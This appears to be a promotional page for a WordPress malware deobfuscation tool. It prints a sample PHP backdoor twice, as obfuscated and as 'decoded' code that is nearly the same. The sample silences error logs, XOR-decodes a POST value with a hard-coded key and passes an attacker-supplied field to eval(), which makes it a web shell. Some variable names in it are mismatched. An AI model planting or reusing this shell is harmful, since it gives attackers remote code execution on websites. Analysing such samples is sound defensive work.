Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php $GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3"; $GLOBALS["baa15"] = "chr"; $GLOBALS["hefaea"] = "ord"; $GLOBALS["b43ce01"] = "strlen"; $GLOBALS["o2dac69"] = "ini_set"; $GLOBALS["n800cc9"] = "json_d...



Obfuscated php code

<?php

$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";

$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";

@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);

$k6de1cb3 = NULL;
$v24368366 = NULL;

function ae858b($k6de1cb3, $rbf8cd4)
{
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}
function c484($k6de1cb3, $rbf8cd4)
{
    return ae858b(ae858b($k6de1cb3, "5p1n-th3-51lly-5tr1ng5"), $rbf8cd4);
}
if (!$k6de1cb3) {
    foreach ($_POST as $rbf8cd4 => $n18fd12d) {
        $k6de1cb3 = $n18fd12d;
        $v24368366 = $rbf8cd4;
    }
}
$k6de1cb3 = @$GLOBALS["x800cc9"]($GLOBALS["qy09b8"]($GLOBALS["oy47y6y4"]($k6de1cb3), $v24368366), true);
if (isset($k6de1cb3["ak"]) && "5p1n-th3-51lly-5tr1ng5" == $k6de1cb3["ak"]) {
    if ($k6de1cb3["a"] == "&") {
        eval($k6de1cb3["L"]);
    }
    exit;
}

Decoded(de-Obfuscated) php code

<?php

$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$k6de1cb3 = NULL;
$v24368366 = NULL;
function ae858b($k6de1cb3, $rbf8cd4)
{
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($k6de1cb3);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($k6de1cb3); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($k6de1cb3[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}
function c484($k6de1cb3, $rbf8cd4)
{
    return ae858b(ae858b($k6de1cb3, "5p1n-th3-51lly-5tr1ng5"), $rbf8cd4);
}
if (!$k6de1cb3) {
    foreach ($_POST as $rbf8cd4 => $n18fd12d) {
        $k6de1cb3 = $n18fd12d;
        $v24368366 = $rbf8cd4;
    }
}
$k6de1cb3 = @$GLOBALS["x800cc9"]($GLOBALS["qy09b8"]($GLOBALS["oy47y6y4"]($k6de1cb3), $v24368366), true);
if (isset($k6de1cb3["ak"]) && "5p1n-th3-51lly-5tr1ng5" == $k6de1cb3["ak"]) {
    if ($k6de1cb3["a"] == "&") {
        eval($k6de1cb3["L"]);
    }
    exit;
}


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.